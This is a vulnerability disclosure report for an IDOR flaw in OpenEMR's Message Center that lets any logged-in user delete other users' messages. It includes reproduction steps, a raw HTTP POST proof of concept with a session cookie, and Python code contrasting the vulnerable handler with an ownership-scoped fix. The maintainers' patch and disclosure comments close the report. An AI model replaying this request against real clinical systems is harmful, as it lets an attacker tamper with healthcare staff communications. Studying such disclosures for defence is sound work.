IDOR leads to deleting messages in other users' Message Centers in openemr/openemr
Reported on
Aug 2nd 2022
Description
I observed that users can delete messages in other users' Message Centers by changing the delete_id parameter to the delete_id value of a message which belongs to another user.
Steps:
- Login with the Physician account and determine the delete_id[] of messages in the Physician's Message Center.
- Login with the Clinician account.
- Go to the Clinician's Message Center, delete a message in the Message Center and use Burp Suite to intercept this request.
- Modify delete_id[] to the delete_id[] of a message which belongs to the Physician's Message Center.
- The message with the corresponding delete_id[] in the Physician's Message Center will be deleted.
Proof of Concept
POST /openemr/interface/main/messages/messages.php?showall=&sortby=pnotes.date&sortorder=desc&begin=0&form_active=1 HTTP/1.1
Host: demo.openemr.io
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.openemr.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://demo.openemr.io/openemr/interface/main/messages/messages.php?form_active=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OpenEMR=F%2CirXOlXHBMtyJUilGMZ0%2C9PvCyhZXGdzItmkF7g5BnT8pyP
Connection: close
task=delete&delete_id%5B%5D=7
Impact
An attacker can delete messages in the Message Center of any user. The victim may then not see messages from others.
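The root cause described above is a delete handler that trusts the client-supplied delete_id[] values without checking that the requesting user owns them. The following is an added example (not OpenEMR's code) that contrasts that pattern with an ownership-scoped delete, using an in-memory SQLite table as a constructed stand-in for the messages table; the column name assigned_to and the user names are assumptions made for the illustration, and the request body is the one from the proof of concept above.

```python
import sqlite3
from urllib.parse import parse_qs


def make_db():
    """Constructed stand-in for a messages table (assumed columns: id, assigned_to, body)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pnotes (id INTEGER PRIMARY KEY, assigned_to TEXT, body TEXT)")
    db.executemany(
        "INSERT INTO pnotes VALUES (?, ?, ?)",
        [
            (7, "physician", "Lab results ready"),   # belongs to the Physician
            (8, "clinician", "Schedule follow-up"),  # belongs to the Clinician
        ],
    )
    db.commit()
    return db


def parse_delete_ids(body):
    """Extract integer ids from a body shaped like the PoC: task=delete&delete_id%5B%5D=7."""
    params = parse_qs(body)  # keys are URL-decoded, so 'delete_id%5B%5D' becomes 'delete_id[]'
    if params.get("task") != ["delete"]:
        return []
    ids = []
    for raw in params.get("delete_id[]", []):
        try:
            ids.append(int(raw))
        except ValueError:
            continue  # non-numeric ids are dropped rather than passed to SQL
    return ids


def delete_messages_vulnerable(db, current_user, body):
    """IDOR pattern: the DELETE is keyed on id alone, so any logged-in user can delete any row."""
    deleted = 0
    for message_id in parse_delete_ids(body):
        cur = db.execute("DELETE FROM pnotes WHERE id = ?", (message_id,))
        deleted += cur.rowcount
    db.commit()
    return deleted


def delete_messages_fixed(db, current_user, body):
    """Hardened form: the DELETE is scoped to rows owned by the requester.

    An id that belongs to someone else matches nothing; such ids are returned
    separately because a request naming them is a signal worth logging.
    """
    deleted, rejected = 0, []
    for message_id in parse_delete_ids(body):
        cur = db.execute(
            "DELETE FROM pnotes WHERE id = ? AND assigned_to = ?",
            (message_id, current_user),
        )
        if cur.rowcount == 1:
            deleted += 1
        else:
            rejected.append(message_id)
    db.commit()
    return deleted, rejected


def remaining_ids(db):
    return [row[0] for row in db.execute("SELECT id FROM pnotes ORDER BY id")]


def demo():
    """Replay the PoC body as the Clinician against both handlers."""
    body = "task=delete&delete_id%5B%5D=7"  # id 7 belongs to the Physician
    vulnerable_db = make_db()
    delete_messages_vulnerable(vulnerable_db, "clinician", body)
    fixed_db = make_db()
    _, rejected = delete_messages_fixed(fixed_db, "clinician", body)
    return remaining_ids(vulnerable_db), remaining_ids(fixed_db), rejected


if __name__ == "__main__":
    print(demo())
```

With the vulnerable handler the Physician's message 7 disappears; with the scoped handler it survives and id 7 is reported as rejected, which is the event an audit log or detection rule should record. The same scoping applies to every bulk operation that accepts a list of ids from the client.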
Thanks for the fix. A preliminary fix has been posted in commit 9c430413101ab170c83ab4aa2d880ecdc170e815
Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 1-3 weeks. After I do that, it will be ok to make a CVE # and make it public.
Thanks!
To clarify the above comment, I meant to initially state "Thanks for the report!"
OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make a CVE # and make this public.